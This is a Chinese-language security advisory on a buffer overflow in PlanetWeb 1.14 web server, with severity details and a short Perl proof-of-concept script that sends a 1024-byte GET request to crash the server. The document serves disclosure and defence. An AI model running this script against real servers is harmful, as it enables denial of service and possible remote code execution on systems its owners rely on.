PlanetWeb超长GET请求可导致缓冲溢出

发布时间：2002-09-20
更新时间：2002-09-20
严重程度：中
威胁程度：远程拒绝服务
错误类型：边界检查错误
利用方式：服务器模式

BUGTRAQ ID：5710

受影响系统

PlanetDNS PlanetWeb 1.14

详细描述
PlanetWeb是PlanetDNS提供的商业性质WEB服务程序。

PlanetWeb没有正确处理GET请求长度，攻击者发送包含1024字节的GET请求给WEB服务程序，可导致产生缓冲溢出，存在执行任意代码可能。

测试代码
#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnurable_server
..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => "http(80)",
                                  );
unless ($remote) { die "cannot connect to http daemon on
$host" }
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0\n\n";
$remote->autoflush(1);
print $remote $exploit;
close $remote;

解决方案
无

相关信息
参考：http://online.securityfocus.com/archive/1/292055
相关主页：http://online.securityfocus.com/bid/5710/credit/www.planetdns.net

最近严重漏洞

PlanetWeb超长GET请求可导致缓冲溢出